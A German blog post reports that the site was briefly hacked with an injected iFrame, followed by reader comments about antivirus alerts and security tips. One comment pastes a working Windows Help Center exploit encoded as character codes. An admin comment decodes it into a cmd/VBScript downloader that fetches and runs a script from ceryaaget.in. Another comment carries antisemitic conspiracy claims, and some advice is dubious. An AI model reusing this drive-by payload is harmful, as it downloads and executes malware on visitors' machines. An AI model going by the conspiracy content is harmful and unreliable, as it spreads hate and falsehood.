Gehackt

Hi, wer in den letzten 2-3 Stunden auf IKN unterwegs war möge doch bitte (sofern er denn unter Windows unterwegs ist und seinen Webbrowser nicht mit NoScript oder ähnlichem schützt) den Virenscanner aktualisieren und drüber laufen lassen. Tatsächlich wurde IKN für ein paar Minuten “gehackt”, d.h. ein Angreifer hat es geschafft ein iFrame ins Layout einzubauen. Schuld ist schätzungsweise (wir tüfteln das noch aus) WordPress.

Wir bitten die evtl. entstandenen Unannehmlichkeiten zu entschuldigen. Derartige Angriffe sind bei uns an der Tagesordnung, und irgendwann musste ja mal einer durchkommen. grtz, anx


57 Responses to Gehackt

  1. Frank H. sagt:

    Abwehrmassnahmen von Lüsen und Schaben auf dem PC Flur:

    Erstens man nutze eifrigst ein Linux Derivat wie Ubuntu oder SuSELinux oder LinuxMint etc. pp. statt CIA ßpfel und Redmont Talks with FBI.

    Dann nutze man Opera und nicht Multiple Sklerose Internet Explorer und nicht den Mac CIA Internet Explorer.

    Leider ist FireFox nicht mehr sicher! Bereits mehrfach gebohrt. Die Pflege hat nachgelassen.

    So das von meiner Seite, grüße aus der Unix Welt.

  2. also gut das ich noch so einen roten regenschirm unten in der task leiste habe. ;-)

  3. Frank H. sagt:

    Ein schweres Erdbeben der Stärke 7,9 hat am Dienstag die Pazifikküste von Mexiko erschüttert. Dies teilte die US-Erdbebenwarte (USGS) mit.

    Ein langes, schweres Erdbeben hat am Dienstagabend (MEZ) die mexikanische Hauptstadt Mexiko-Stadt erschüttert.

    Es hatte nach Angaben de US-Erdbebenwarte eine Stärke von 7,9. Das Zentrum lag in rund zehn Kilometern Tiefe im südmexikanischen Staat Guerrero.

    Auch in der Hauptstadt Mexiko-Stadt schwankten Gebäude. Beschäftigte rannten aus ihren Büros, Anwohner verließen in Panik ihre Wohnungen. Der Bürgermeister der Hauptstadt, Marcello Ebrard, twitterte: ß?Wir haben ein Erdbebenß?.

    Menschen liefen auf die Straße. Hochhäuser schwankten, wie ein dpa-Reporter berichtete. Hubschrauber kreisten über der Hauptstadt.

    http://www.welt.de/vermischtes/weltgeschehen/article13933381/Erdbeben-der-Staerke-7-9-erschuettert-Mexiko-Stadt.html

  4. Irmonen sagt:

    Vorsorge – Selbversorgen, für Städter ohne Balkon:
    die hängenden Fenstergärten zum selbermachen:
    http://www.youtube.com/watch?v=-8shuvMGIvc&feature=player_embedded

  5. Irmonen sagt:

    da bin ich falsch gelandet wollte zu offtopid, sorry

  6. chris321 sagt:

    Das Mini-X Betriebssystem hat jetzt nicht nur die EU-Unterstützung von ca. 3 Mio. kurz vor der Embedded in Nürnberg bekommen, sondern hat auch die erste Runde im GSoC (Google Summer of Code) bestanden.

    Ist jetzt ein bisschen Stress bei “den Anglikanern”, weil ihnen das gar nicht gefällt zumal Mini-X konkret darauf zielt
    + eine hohe Transparenz und Standardisierung auch bzgl. des IT-Wissenstandes über ganz Europa zu schaffen
    + eine sehr grundlegende für alle IT-Spezialisten noch nachvollziehbare Basis zu werden auf die sich alle als Mindestvoraussetzungen einigen können
    + eine Unabhängigkeit zur US-Vorherrschaft zu werden
    + zunehmend die Chance bekommt so wie die Programmiersprache Ada und Hardware im US-Militär, von Regierungen in Zukunft für Ausschreibungen herangezogen zu werden
    + Maschinenhersteller EU-nationenübergreifend eine EU-standardkonforme Lösung zu bieten.
    + durch den universitären Hintergrund die Sache einfach deutlich weniger chaotisch ist als viele andere OpenSource Projekte und das Potential hat so auch strukturierter zu bleiben

    usw.

    Die Anglikaner meinen, dass so ein Lobbyismus von EU und Regierungsseite nicht erfolgsversprechend sei. Ich habe mich gewundert was für eine “Wut über die E.U. oder U.E.” (wie sie schreiben) existiert. In dem Moment musste ich mich schon sehr wundern? Wenn wir das gegen die EU haben, das ist ja eine Sache, aber warum diese Wut von der anderen Seite von der ich das gar nicht erwartet habe. Was haben wir den USA angetan oder warum sind die so wütend auf uns? Hat die anglikanische Propaganda es geschafft Hass auf uns zu schüren wir wären an der Weltwirtschaftskrise schuld? Also das hat mich dann doch schon sehr gewundert und die Diskussion rund um die Mini-X Unterstützung war dann quasi bei ihnen wie der Deckel auf dem dampfenden Topf.

    Kann mir mal jemand der die Lage hier besser versteht erklären warum die auf uns Europäer so stinkig sind. Ok, die führen wohl einen Wirtschaftskrieg gegen uns, aber das geht ja schon inzwischen ins emotionale? Die Resonanz die ich so registriert habe, die kam mir doch vor wie die Reaktion Polen gegen die Russen, recht schlecht drauf, feindschaftliche Tendenz, aber irgendwie dennoch zu feige es offen zu sagen …

  7. Habnix sagt:

    Die Amis haben einige Wirtschaftliche Probleme und die werden noch Gift und Galle spucken bis nach Europa.

    Ihre dingsbums Papiere glaube ich Pfandpapiere oder Anleihepapiere werden sie in Zukunft vielleicht nicht mehr so schnell los.

    Kein Kredit mehr für die Amis,oh wie kreuslich. ;-)

  8. Sundance sagt:

    Auf was hat der Hacker zugegriffen ?
    Was gibt es hinterm Vorhang, was nicht auch online ist?

  9. chris321 sagt:

    Ich hatte auch einen Eindruck von Konkurrenzdenken den ich früher nicht so wahrgenommen habe. Könnte sein, die wollen auf keinen Fall, dass die EU mehr zusammen rückt. Die wollen eine zerstrittene gespaltene EU, so habe ich den Eindruck gehabt. Dann kommt man da mit einem EU-Gemeinschaftsprojekt und da flippen die Amis und Engländer aus. Die USA & Engländer wollen keine autonome und keine starke EU, so muss man das wohl verstehen. Mit einem Verlust der nationalen Identität oder Kultur wie wir das hier bei uns in Europa verstehen, hat diese EU-Ablehnung von abroad nichts zu tun. Deren Ablehnung ist eine klare Absage an Autonomie und Stärke. Quasi: Sie, “unsere Freunde” wollen anscheinend keinen 2. neben sich haben!?

  10. bald eagle sagt:

    bleib standhaft cheffe,

    die können den “sand im meer” nicht leerschaufeln.
    wir sind schon zuviele!

    ps:

    für alle fälle,wenn du mal ne neue seite aufmachen musst,
    wie sollen wir vorgehen,um ik wieder zu finden?!

  11. sternenstaub sagt:

    Hallo Jens
    eine frage dazu :
    gestern kamen Mails , die ich an gmail,yahoo.de, t- online und freenet versandte immer zurueck mit dem Vermerk : ihre mails wurde abgelehnt weil moeglicherweise ein virus bei ihnen ist .
    Ich habe nun mehrere accounts, und bei allen passierte das gleiche .
    Was ich aber nicht verstehe, das es innerhalb Spaniens ,Amerika und Asien problemlos ging .
    Mein Virenprogramm zeigt aber nichts an, sagt , das alles in Ordnung ist .
    Ich habe dann jemanden gebeten, an die deutschen Emails ebenfalls zu senden, und der hatte das gleiche Problem, alle Mails kamen mit der Virenwarnung zurueck .
    Ich schliesse einmal aus, wobei er auch auf deiner Seite war, das es etwas damit zu tun hat .
    Die emails von besagten Deutschen, kamen aber problemlos hier an .
    Gruss
    helga

  12. bruujo sagt:

    @chris321
    ich halte das für “reverse psychology” – im gegenteil: die EU ist eine Erfindung Washingtons.
    see : http://www.mmnews.de/index.php/politik/9735-von-der-udssr-zur-eudssr-und-nwo

  13. bruujo sagt:

    wenn er einen iFrame platziert hat, muss er übern secure port als admin rein.

  14. bruujo sagt:

    Das ganze Surfen entwickelt sich immer mehr zum Eiertanz. Cookies ein/aus löschen. Script ein/aus , Flash usf.
    Im nächsten Schritt dann proxies, IPHeader change, zu einem gemieteten v-server über SSH tunneln …

  15. sternenstaub: manche free-v-scannner erkennen eben nicht alles was an müll rüberkommt. versuch mal spy-boot und dann win-update zu machen. vieleicht erübrigt sich dann so mancher mist von selbst.

  16. sternenstaub sagt:

    Lieber Rock on Silver :
    mein Pc ist wie mein Auto, ich mache an , und fahre bzw schreibe los .Bis windows up date konnte ich Dir nun folgen, aber was ist ein Spy Bootß?Liest sich jetzt gerade fuer mich wie ein Agenten Schiff ?!
    Ich haenge dir mal an, was mir da als mail delivery aus deutschland immer zurueck kommt(hier von t online, aber die anderen waren gleichlautend (das erschien demjenigen , der dann auch mal probierte auch ) :
    _Die_Annahme_Ihrer_Nachricht_wurde_abgelehnt,_da_sie_als_Spam_oder/550-5.7.0_Virus_eingestuft_wurde._Sollten_Sie_dies_als_unzutreffend_ansehen,/550-5.7.0_senden_Sie_bitte_obige_Fehlercodes_an_FPR@RX.T-ONLINE.DE,_damit_wir/550-5.7.0_die_Klassifizierung_untersuchen_k__nnen._Wir_entschuldigen_uns_f__r/550_5.7.0_etwaige_Unannehmlichkeiten_und_bedanken_uns_f__r_Ihre_Unterst__tung!/

  17. deinen virenscanner bitte NICHT als malware-scanner verwenden – taugt nix! Nimm spybot – arbeitet mit z.B. AntiVir(free) SUPER zusammen! Dann guck ste mal weiter… :)

    http://www.safer-networking.org/de/index.html

    und win-updates bitte nicht vergessen.

  18. oder du machst es so wie frank mit dem pinguin

  19. sternenstaub sagt:

    Hallo rock
    er analysiert gerade ,also der spybot, danke fuer den link .das windowsupdate, macht das bei mir automatisch, er zeigte mir an ,das er heute morgen schon ein update gemacht hat .
    Jetzt habe ich frank gesucht wegen dem pinguin .
    damit ist ja linux gemeint.
    ich habe nun windows 7, kann ich denn den linux einfach drueber laden ? oder muss ich den formatieren ?

  20. Yadahaddu Iriwadschi sagt:

    Virenscanner geht voll ab

    Trojaner auf IK News ßß?

    16,45 Uhr

  21. Jens Blecker sagt:

    Welchen Scanner beutzt du?

  22. wobi sagt:

    No Script hat auch wieder was gefunden:

    Adresse ist:
    h t t p://ceryaaget.in/index.php?tp=89c9473171a1c848

    wieder unten links auf der Seite ein Java-Applet

  23. Yadahaddu Iriwadschi sagt:

    Kaspersky

    Meldet laufenend Trojaner

    Selben wie bei Wobi

  24. hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,99,101,114,121,97,97,103,101,116,46,105,110,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,55,102,50,52,49,38,100,61,49,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));

    und so was soll ich als programm jetzt zulassen?

  25. besser ist du hast noch so einen älteren 2. rechner für linux. dann kommen sich die systeme im dual-boot nicht in die quere. den älteren rechner bekommst du inzwischen schon unter 100ß?. und für linux brauchst du auch nicht so viel rechnerleistung wie für das win.

    oder: da du schon auf win7 umbestiegen bist, dann wartest du das win8 ab. da soll dan noch viel mehr linux im win drin sein.

  26. Frank H. sagt:

    Also ich bin hier, wer noch?

  27. also ich bin auch noch nicht down.
    mal sehn wer hier das bessere system am laufen hat (hehe)

  28. Uriel sagt:

    Falls es hilft…heute 17h:

    Beim Zugriff auf Daten der URL “http://ceryaaget.in/content/sp30.jar”
    wurde ein Virus oder unerwünschtes Programm ‘EXP/2010-0094.AK’ [exploit] gefunden.
    Durchgeführte Aktion: Der Zugriff auf die Datei wurde blockiert

  29. sternenstaub sagt:

    Hallo Rock
    einen 2. rechner hab ich noch, nun habe ich den spy checken lassen und der der hat einiges gefunden, als ich das entfernen wollte , kam die meldung, das er das nicht machen koennte, weil das mein system schaedigen wuerde .
    irgendwas mit win .ii. so irgendwas .
    ratlos bin ich jetzt alle mal .
    lg
    helga

  30. achmedius sagt:

    bei mir machts keine probleme mehr, hab mit dem malewarescanner den troyaner exp… auch entdeckt,
    bei witerer recherche gelesen das das ein javaproblem ist hab dann java runtergeschmissen, neuste version geladen rechner runtergefahren, wieder hoch, dann hats nochmal gepipst, rechner wieder aus, jetzt zwei stunden später keine reaktion von antivir mehr, hoffe ich werde jetzt nicht total überwacht, ach ja werden wir ja eh schon,
    muss schnell kochen,
    bis gleich

  31. Frank H. sagt:

    Dann treten wir mal diesen Trojanerschweinen in den After die Stiefelspitzen rein.
    Band Zeitlos. “Gegen den Strom”
    http://www.youtube.com/watch?v=BFNfbPOtEEY
    Band Zeitlos. “Die Büchse der Pandorra”
    http://www.youtube.com/watch?v=CiIgdiRSgFg

  32. Frank H. sagt:

    Hört das ganze Album der Band an! Ein Must Have. Danke.

  33. lass die systemrelevante ;-) datei zuerst mal noch drinn, die ist eh schon ins system rein und wirst so leicht nicht los.

    versuchs mal zuerst mit http://www.hijackthis.de/de um überhaupt zu wissen was an deinem system so rumläuft.

    oder du googlest nach deiner win.ii dann findest du massig anleitungen ob und wie du den trojaner wieder los wirst.

    evtl. musst du den trojaner im F8 win-abgesicherten modus entfernen.

    wünsche dir viel erfolg dabei.

  34. anju sagt:

    werd ich machen, sehr interessant. danke für den tip

  35. Frank H. sagt:

    Zeitlos. Zweite Chance. Klasse Band, das ist TEXT und kommt von einer aufgeweckten Jugend.
    http://www.youtube.com/watch?v=HgRigO40hpA

  36. anju sagt:

    @ frank zu zeitlos…

  37. Frank H. sagt:

    @anju. Naja, ER ist schon immer zeitlos IN gewesen…ok?^^

    Das Album wurde heute hochgeladen. Und ich fall prompt drüber, hab ganz was anderes gesucht.
    *Er gibt Seele und Geist, wie Herz und Verstand*

  38. Sundance sagt:

    Einem Scanner aus Deutschland oder USA/England/Israel würde ich nie wieder installieren.
    Die schicken selbst die Viren los, damit Du den update machst. Um bei gelegenheit nach Schlüsselwörtern zu suchen. Der Update ist schon der Trojaner.

    Nee, nehmt den rising antivbir und firewall, emailscan usw. aus China. Niedlicher Löwe, wenn der was findet macht er shopsui draus.
    Sind alle umsonst, denke nur der internet security kostet.

    http://www.rising-global.com/Download/Home-Home-Office/Rising-Internet-Security-2011.html

    Und mal aufräumen mit wise cleaner, die unteren 3 sind umsonst.

    http://wisecleaner.com/download.html

  39. Sundance sagt:

    Dieser regcleaner ist auch gut, wenn auch schon älter.2007 lezter update.

    Nach Installation Sprache auswählen.
    und dann nur tools verwenden>>> clean REG all
    (nie die Hardware zurücksetzen!)

    http://regcleaner.en.softonic.com/download

    Unten über dem blauen Strich der kleine alternativ link.

    Wenn Du wissen willst, was alles auf dem PC läuft, nimm autoruns.
    Da kann man leicht ein Häkchen entfernen und wenn dann was nicht geht, setzt Du es neu.
    rechtsklick bringt dich sofort ins Internet und erklärt dir um was es sich handelt.
    Sehr gutes tool, eins der besten.

    http://www.filehippo.com/download_autoruns/download/4034ff917b7a1c86058c9618fa4d1ba5/

  40. Sundance sagt:

    Wer Firefox hat, das Icon firefox.exe von Programme in neuen Ordner kopieren und umbenennen in , denk Dir was aus. So wird der nicht sofort erkannt.
    Firefox 4x so schnell machen:
    about:config

    scroll down bis ; network.http.pipelining.maxrequest (von 4 auf 16 setzen)
    der link dadrüber : network.http.pipelining (von false auf true setzen) browser schliessen.

    Habe noch 3 wichtige andere gute tunes für die config.

    Mit rechtsclick neu einfügen über integer und auf 500000setzen.

    content.notify.interval;500000
    + den Boolean auf true:content.notify.ontimer;true

    wer die anderen haben will muss bescheid sagen.

  41. sternenstaub sagt:

    Ich noch mal :
    heute bekam ich eine Serie an emails von den deutschen Kontakten :
    das Problem war auch innerhalb Deutschlands, oder ist es noch , das scheint nicht nur ein HackProblem von IKN zu sein, sondern irgendetwas mit den deutschen Emailanbietern .
    Die kamen wohl mit dem Nachlesen der Mails in der Vorratsdatenspeicherung nicht mehr nach :-)

  42. anju sagt:

    bedrohung wurde blockiert

    feuerfuchs und avg

    migrateras.in/index.php?tp=89c9473171a1c848

  43. anju sagt:

    seltsam, kommentare funktionieren, rest siehe oben… hatte ich noch nie

  44. anx sagt:

    dann poste doch direkt die übersetzung :>

    cmd /c echo B=”l.vbs”:With CreateObject(“MSXML2.XMLHTTP”):.open “GET”,”http://ceryaaget.in/content/hcp_vbs.php?f=7f241&d=1″,false:.send():Set A = CreateObject(“Scripting.FileSystemObject”):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + “\” + B):D.WriteLine .responseText:End With:D.Close:CreateObject(“WScript.Shell”).Run A.GetSpecialFolder(2) + “\” + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe

    pfui wa?

  45. Jens Blecker sagt:

    In den letzten Tagen scheint sich eh irgendwas mit dem Web abzuspielen. Etliche Leute berichten von Problemen und lags beim normalen Surfen etc.

  46. Sundance sagt:

    Wir sollten uns eh angewöhnen die Schlüsselwörter(jeder möge die für sich entscheiden), absichtlich falsch schreiben, aber bitte so das Jeder noch weiss was damit gemeint ist.

    Kazzaren z.B. die Wischer

  47. Sundance sagt:

    Hatte das übriegens schon vor gut 6 Monaten empfohlen.
    Wenn man über den Kriiieg der neeu-en Welttodnung schreibt, sollte mandie Syoniesten nicht immer zu deutlich darin vorheben. Die ja nicht identisch mit den Jhuden sind, sondern eher der Kaabale des Papsstes entsprechen.

  48. Sundance sagt:

    Ok die Wikser

  49. Sundance sagt:

    Nehmt ixquick, besorgt euch die IPs eurer Seiten; legt ein word doc an den Namen der Seite dahinter die Ip.
    kopiert die IP in browser, dann läuft das nicht über den DNS.

  50. anx sagt:

    wisst du da nicht deine hosts datei mit füttern?

    bei XP ff. in: “%SystemRoot%\system32\drivers\etc\hosts”
    linux: /etc/hosts

    78.46.64.217 iknews.de

    siehe auch: http://de.wikipedia.org/wiki/Hosts-Datei

  51. Newsticker2012 sagt:

    Bestätige auch mal 2 kleine Viren auf meinem PC.

    1 Adware/InstallCor.A Malware Level 1 09.08.2012 06.06.2012
    2 Adware/Rogue.141312 Malware Level 1 08.08.2012 06.08.2012

Hinterlasse eine Antwort